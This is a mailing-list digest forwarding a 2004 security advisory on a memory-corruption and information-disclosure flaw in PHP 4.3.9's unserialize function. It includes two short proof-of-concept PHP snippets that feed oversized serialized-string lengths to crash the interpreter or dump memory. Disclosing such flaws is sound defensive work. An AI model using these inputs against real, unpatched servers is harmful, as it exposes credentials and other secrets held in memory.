[Please upgrade PHP on all platforms. Not clear yet whether this only affects PHP4 or later versions also -- Raju]
This is an RFC 1153 digest. (1 message) ---------------------------------------------------------------------- Message-Id: <[EMAIL PROTECTED]> From: Martin Eiszner <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: php unserialize Date: Wed, 15 Dec 2004 22:32:54 +0100 ============================================================== SEC-CONSULT Security Advisory PHP - 4.3.9 unserialize function ======================OOOOOOOOOOOO============================ Product: PHP 4.3.9 (Win32/Unix) Remarks: no other Versions tested but very likely vulnerable Vulnerablities: - Data Segment memory corruption - Information disclosure / Memory dumping Vendor: PHP (http://www.php.net/) Vendor-Status: vendor contacted (19.11.2004) Vendor-Patchs: vendor has released bugfixed versions Object: --- Exploitable: Local: --- Remote: PARTIAL (OS-dependent) ============ Introduction ============ Visit "http://www.php.net"; for additional information. ===================== Vulnerability Details ===================== 1) Memory Corruption / buffer overflow ====================================== FUNCTION: unserialize (http://at.php.net/manual/en/function.unserialize.php) DESCRIPTION: Insufficient input validation of serialized strings lead to memory corruption and information disclosre. EXAMPLE script - "Segfault": ---cut here--- <? $s = 's:9999999:"A";"'; $a = unserialize($s); print $a; ?> ---cut here--- REMARKS: leads to arbitrary code execution and file/information disclosure. EXAMPLE script - "Memory Dump": ---cut here--- <? // session- and stuff $secret_username="uaaaa"; $secret_password="hoschi"; // stuff // $c = $_COOKIE ['crypted_stuff'] // $c = some cookie /* simplyfied --> userinput */ $c = 's:30000:"crap";'; $userdata = unserialize($c); // // check $userdata stuff // for some reason output $userdata print $userdata . "\n is NOT valid !!\n"; // stuff ?> ---cut here--- REMARKS: Could theoretically be used to circumvent safe-mode and/or gain sensitive information about script- and memory areas. =============== GENERAL REMARKS =============== We would like to apologize in advance for potential nonconformities and/or known issues. ========================================================================================================================= FOR SOME STRANGE REASONS HARDENED-PHP.NET HAS RELEASED THIS ADVISORY TODAY TOGETHER WITH A BUNCH OF OTHER VULNERABILITIES ========================================================================================================================= ==================== Recommended Hotfixes ==================== Vendor-Patches: vendor has released bugfixed versions ======= Contact ======= SEC-CONSULT Austria / EUROPE [EMAIL PROTECTED] EOF Martin Eiszner / @[EMAIL PROTECTED] ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F It is the mind that moves ------------------------------------------------------- SF email is sponsored by - The IT Product Guide Read honest & candid reviews on hundreds of IT Products from real users. Discover which products truly live up to the hype. Start reading now. http://productguide.itmanagersjournal.com/ _______________________________________________ linux-india-help mailing list [EMAIL PROTECTED] https://lists.sourceforge.net/lists/listinfo/linux-india-help
